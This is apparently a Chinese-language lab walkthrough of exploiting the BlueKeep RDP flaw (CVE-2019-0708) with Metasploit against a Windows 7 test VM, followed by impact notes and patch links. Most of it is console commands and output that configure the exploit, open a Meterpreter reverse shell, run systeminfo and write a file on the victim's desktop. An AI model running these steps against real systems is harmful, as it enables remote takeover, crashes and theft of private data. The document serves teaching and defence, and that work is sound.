CVE-2019-0708 攻防演练

1、环境准备

• 靶机系统：en_windows_7_ultimate_with_sp1_x64_dvd_618240.iso
• 攻击载荷：Kali Linux VMware 64-Bit (7z)2021.1

2、配置准备

• 靶机与攻击机网络互通（攻击机172.29.128.5，靶机172.29.128.6）

──(kali㉿kali)-[~/Desktop]
└─$ ping 172.29.128.6 
PING 172.29.128.4 (172.29.128.6) 56(84) bytes of data.
64 bytes from 172.29.128.6: icmp_seq=1 ttl=128 time=13.7 ms
64 bytes from 172.29.128.6: icmp_seq=2 ttl=128 time=0.218 ms
rtt min/avg/max/mdev = 0.218/6.940/13.662/6.722 ms
                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet `172.29.128.5`  netmask 255.255.0.0  broadcast 172.29.255.255
        inet6 fe80::20c:29ff:fe9f:24fb  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:9f:24:fb  txqueuelen 1000  (Ethernet)
        RX packets 4740844  bytes 314309577 (299.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7276969  bytes 8831983959 (8.2 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

• 靶机开放远程桌面3389端口
  

3、攻击演练

3.1载荷设置

• 查询载荷信息

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > search cve_2019_0708_bluekeep_rce
Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

• 进入载荷设置

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
- 设置本机反射地址
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 172.29.128.5
lhost => 172.29.128.5
- 设置靶机地址
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 172.29.128.6
rhosts => 172.29.128.6
- 设置target[参考4.2target选择]
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 4
target => 4
- 可选
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set forceexploit true
forceexploit => true

3.2 使用攻击

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.29.128.5:4444 
[*] 172.29.128.6:3389 - Executing automatic check (disable AutoCheck to override)
[*] 172.29.128.6:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 172.29.128.6:3389     - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389     - Scanned 1 of 1 hosts (100% complete)
[+] 172.29.128.6:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[!] 172.29.128.6:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.29.128.6:3389 - Surfing channels ...
[*] 172.29.128.6:3389 - Lobbing eggs ...
[*] 172.29.128.6:3389 - Forcing the USE of FREE'd object ...
[!] 172.29.128.6:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200262 bytes) to 172.29.128.6
[*] `Meterpreter session 1 opened (172.29.128.5:4444 -> 172.29.128.6:49157) `at 2021-05-01 18:08:01 -0400

3.3 获取shell

• systeminfo系统信息

meterpreter > shell
Process 2812 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 `WIN-UMQ8R7HIGV8`
OS Name:                   Microsoft Windows 7 Ultimate 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00426-292-0000007-85573
Original Install Date:     5/2/2021, 2:50:09 AM
System Boot Time:          5/2/2021, 6:07:04 AM
···

• 桌面文件写入hi.txt

C:\>cd Users\dahouzi\Desktop
C:\Users\dahouzi\Desktop>echo "i am come in!" >>hi.txt
echo "i am come in!" >>hi.txt

4、危害及防御措施

4.1 两种危害

• 蓝屏

生产环境或个人电脑受到攻击时，大概率会蓝屏，此时正在运行的应用或在编辑的文档数据会丢失。

• 提权

远程提权成功，相当于我拥有你电脑的一切权限。你跟小三的照片，呵呵呵！

4.2 防御措施

• 安装补丁（防火墙不可防）
• 关闭3389端口或者指定IP访问

4.3 补丁地址

微软建议：https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708

• Windows XP、Windows 2003：
  https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

• Windows 7、Windows 2008R2：
  https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175

• Windows 2008：
  https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499180

5、其它信息

5.1 目标漏洞存活检测

• 172.29.128.4:3389 - The target is vulnerable.表示很脆弱，可能存在漏洞

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > auxiliary/scanner/rdp/ms12_020_check
[-] Unknown command: auxiliary/scanner/rdp/ms12_020_check.
This is a module we can load. Do you want to use auxiliary/scanner/rdp/ms12_020_check? [y/N]   y
msf6 auxiliary(scanner/rdp/ms12_020_check) >  set RHOSTS 172.29.128.4
RHOSTS => 172.29.128.4
msf6 auxiliary(scanner/rdp/ms12_020_check) > run

[+] 172.29.128.4:3389     - 172.29.128.4:3389 - The target is vulnerable.
[*] 172.29.128.4:3389     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

5.2 攻击前信息确认

• targets选择
• RHOSTS：172.29.128.6
• RPORT：3389

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info

       Name: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
     Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2019-05-14

Provided by:
  Sean Dillon <sean.dillon@risksense.com>
  Ryan Hanson
  OJ Reeves <oj@beyondbinary.io>
  Brent Cook <bcook@rapid7.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic targeting via fingerprinting
  1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
  2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
  3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
  4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
  5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
  6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
  7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
  8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  RDP_CLIENT_IP    172.29.128.7     yes       The client IPv4 address to report during connect
  RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
  RDP_DOMAIN                        no        The client domain name to report during connect
  RDP_USER                          no        The username to report during connect, UNSET = random
  RHOSTS           172.29.128.6     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT            3389             yes       The target port (TCP)